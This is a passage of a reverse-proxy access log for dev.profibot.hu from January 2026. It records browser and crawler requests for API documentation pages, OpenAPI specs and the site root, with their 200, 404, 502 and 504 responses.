[Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:15 +0000] - 200 200 - GET https dev.profibot.hu "/tools/translations.js?ver=91100" [Client 62.210.198.214] [Length 321] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/login?next=/" +[19/Jan/2026:13:22:16 +0000] - 200 200 - GET https dev.profibot.hu "/static/js/generated/fonts/Roboto-Regular..ttf" [Client 62.210.198.214] [Length 171676] [Gzip -] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "https://dev.profibot.hu/static/js/generated/style.css?ver=91100" +[19/Jan/2026:13:22:20 +0000] - 404 404 - GET https dev.profibot.hu "/login/ads.txt" [Client 62.210.198.214] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[19/Jan/2026:13:22:20 +0000] - 404 404 - GET https dev.profibot.hu "/login/app-ads.txt" [Client 62.210.198.214] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[19/Jan/2026:13:22:20 +0000] - 404 404 - GET https dev.profibot.hu "/login/sellers.json" [Client 62.210.198.214] [Length 184] [Gzip 1.20] [Sent-to pgadmin-ui] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.3" "-" +[19/Jan/2026:21:17:08 +0000] - - 301 - GET http dev.profibot.hu "/docs" [Client 37.76.9.111] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:17:08 +0000] - - 502 - GET https dev.profibot.hu "/docs" [Client 37.76.9.111] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:17:08 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.9.111] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[19/Jan/2026:21:17:16 +0000] - - 502 - GET https dev.profibot.hu "/docs" [Client 37.76.9.111] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:17:16 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.9.111] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[19/Jan/2026:21:18:04 +0000] - - 502 - GET https dev.profibot.hu "/redoc" [Client 37.76.9.111] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:18:04 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.9.111] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/redoc" +[19/Jan/2026:21:18:05 +0000] - - 502 - GET https dev.profibot.hu "/redoc" [Client 66.249.93.77] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:21:18:06 +0000] - - 502 - GET https dev.profibot.hu "/redoc" [Client 66.249.83.107] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:21:18:06 +0000] - - 502 - GET https dev.profibot.hu "/redoc" [Client 66.102.8.171] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:21:40:45 +0000] - 200 200 - GET https dev.profibot.hu "/redoc" [Client 37.76.9.111] [Length 525] [Gzip 1.75] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:21:40:46 +0000] - 200 200 - GET https dev.profibot.hu "/openapi.json" [Client 37.76.9.111] [Length 2507] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/redoc" +[19/Jan/2026:22:32:30 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 37.76.10.15] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:22:32:30 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.10.15] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[19/Jan/2026:22:32:31 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 66.249.81.5] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:22:32:31 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 66.249.81.5] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:22:32:32 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 142.250.33.38] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[19/Jan/2026:22:33:38 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 37.76.10.15] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:22:33:47 +0000] - 200 200 - GET https dev.profibot.hu "/redoc" [Client 37.76.10.15] [Length 526] [Gzip 1.75] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:22:37:10 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 37.76.10.15] [Length 507] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[19/Jan/2026:22:37:10 +0000] - 200 200 - GET https dev.profibot.hu "/openapi.json" [Client 37.76.10.15] [Length 2451] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[20/Jan/2026:06:45:38 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:45:38 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/" +[20/Jan/2026:06:45:45 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 84.1.26.27] [Length 507] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:45:45 +0000] - 200 200 - GET https dev.profibot.hu "/openapi.json" [Client 84.1.26.27] [Length 2451] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/docs" +[20/Jan/2026:06:56:06 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 84.1.26.27] [Length 507] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[20/Jan/2026:06:56:07 +0000] - 200 200 - GET https dev.profibot.hu "/openapi.json" [Client 84.1.26.27] [Length 2451] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/docs" +[20/Jan/2026:12:12:55 +0000] - 404 404 - GET https dev.profibot.hu "/robots.txt" [Client 74.7.228.17] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot" "-" +[20/Jan/2026:12:12:56 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 74.7.243.192] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-" +[20/Jan/2026:15:27:12 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 31.46.76.56] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "-" +[20/Jan/2026:15:27:12 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 31.46.76.56] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://dev.profibot.hu/" +[20/Jan/2026:15:27:22 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 31.46.76.56] [Length 507] [Gzip 1.92] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "-" +[20/Jan/2026:15:27:22 +0000] - 200 200 - GET https dev.profibot.hu "/openapi.json" [Client 31.46.76.56] [Length 2451] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36 Edg/144.0.0.0" "https://dev.profibot.hu/docs" +[20/Jan/2026:16:22:03 +0000] - - 301 - GET http dev.profibot.hu "/" [Client 35.196.224.252] [Length 166] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[20/Jan/2026:16:22:04 +0000] - 404 404 - GET https dev.profibot.hu "/" [Client 35.196.224.252] [Length 22] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "http://dev.profibot.hu" +[20/Jan/2026:21:31:31 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 204.76.203.25] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3" "-" +[21/Jan/2026:19:52:32 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 51.89.23.223] [Length 154] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0" "-" +[21/Jan/2026:22:35:12 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:22:35:12 +0000] - - 502 - GET https dev.profibot.hu "/js/twint_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:22:35:12 +0000] - - 502 - GET https dev.profibot.hu "/css/support_parent.css" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[21/Jan/2026:22:35:12 +0000] - - 502 - GET https dev.profibot.hu "/js/lkk_ch.js" [Client 84.254.106.197] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:10:53:01 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "-" +[22/Jan/2026:10:53:01 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 84.1.26.27] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:11:12:05 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 37.76.14.132] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:11:12:05 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.14.132] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:11:12:06 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 66.249.81.5] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:11:12:07 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 66.102.8.171] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:11:12:07 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 66.102.8.173] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Mobile Safari/537.36 (compatible; Google-Read-Aloud; +https://support.google.com/webmasters/answer/1061943)" "-" +[22/Jan/2026:18:25:19 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:25:20 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:25:20 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:18:25:22 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:25:22 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:18:26:33 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:26:33 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:18:26:35 +0000] - - 502 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:26:35 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:18:26:48 +0000] - - 502 - GET https dev.profibot.hu "/docs" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:26:48 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[22/Jan/2026:18:26:50 +0000] - - 502 - GET https dev.profibot.hu "/docs" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:26:50 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[22/Jan/2026:18:26:52 +0000] - - 502 - GET https dev.profibot.hu "/docs" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:26:52 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[22/Jan/2026:18:27:31 +0000] - - 502 - GET https dev.profibot.hu "/docs" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:27:31 +0000] - - 502 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.11.122] [Length 556] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[22/Jan/2026:18:39:57 +0000] - - 499 - GET https dev.profibot.hu "/docs" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:40:06 +0000] - - 499 - GET https dev.profibot.hu "/docs" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:41:11 +0000] - - 499 - GET https dev.profibot.hu "/redoc" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:41:41 +0000] - 504 504 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 566] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:45:10 +0000] - - 499 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:46:41 +0000] - 504 504 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 566] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:46:58 +0000] - - 499 - GET https dev.profibot.hu "/" [Client 37.76.11.122] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:59:06 +0000] - - 499 - GET https dev.profibot.hu "/" [Client 37.76.12.67] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:59:18 +0000] - - 499 - GET https dev.profibot.hu "/" [Client 37.76.12.67] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:18:59:34 +0000] - - 499 - GET https dev.profibot.hu "/" [Client 37.76.12.67] [Length 0] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:02:00 +0000] - 504 504 - GET https dev.profibot.hu "/" [Client 37.76.12.67] [Length 566] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:05:41 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 37.76.12.67] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:05:47 +0000] - 200 200 - GET https dev.profibot.hu "/docs" [Client 37.76.12.67] [Length 526] [Gzip 1.92] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:19:05:47 +0000] - 200 200 - GET https dev.profibot.hu "/api/v1/openapi.json" [Client 37.76.12.67] [Length 15787] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/docs" +[22/Jan/2026:23:03:11 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 37.76.47.183] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:03:13 +0000] - 404 404 - GET https dev.profibot.hu "/favicon.ico" [Client 37.76.47.183] [Length 22] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "https://dev.profibot.hu/" +[22/Jan/2026:23:09:17 +0000] - 200 200 - GET https dev.profibot.hu "/" [Client 37.76.47.183] [Length 85] [Gzip -] [Sent-to 192.168.100.43] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:35:08 +0000] - 200 200 - GET https dev.profibot.hu "/redoc" [Client 37.76.44.1] [Length 535] [Gzip 1.75] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "-" +[22/Jan/2026:23:35:08 +0000] - 200 200 - GET https dev.profibot.hu "/api/v1/openapi.json" [Client 37.76.44.1] [Length 15787] [Gzip -] [Sent-to service_finder_api] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile 